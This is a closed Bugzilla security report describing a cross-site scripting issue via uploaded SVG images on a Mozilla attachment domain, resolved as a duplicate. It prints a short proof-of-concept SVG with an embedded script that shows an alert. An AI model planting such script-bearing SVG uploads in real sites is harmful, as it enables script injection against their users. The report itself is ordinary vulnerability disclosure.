Closed Bug 1168638 Opened 9 years ago Closed 9 years ago

XSS vulnerability via SVG files

Categories

(Bugzilla :: bugzilla.org, defect)

Product:
Bugzilla
Component:
bugzilla.org
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

()

Status:
RESOLVED DUPLICATE of bug 38862

People

(Reporter: yaaboukir, Unassigned)

Details

Attachments

(1 file)

PoC.svg
(deleted), image/svg+xml
Details
Attached image PoC.svg (deleted) — 
Hi,

I am able to execute XSS vulnerability by uploading an SVG image in which I injected a malicious javascript payload. The XSS is being executed in the context of bug1154535.bugzilla.mozilla.org

Proof Of Concept :
When you open the attached image, the XSS will be triggered (No harmful payload).

Image code : 
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert("XSSed by Yassine !");
   </script>
</svg>

Kind regards.
The attachment is on a separate domain name, so you cannot do much harm this way.
Group: bugzilla-security
Status: UNCONFIRMED → RESOLVED
Closed: 9 years ago
Resolution: --- → DUPLICATE
Flags: sec-bounty-
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: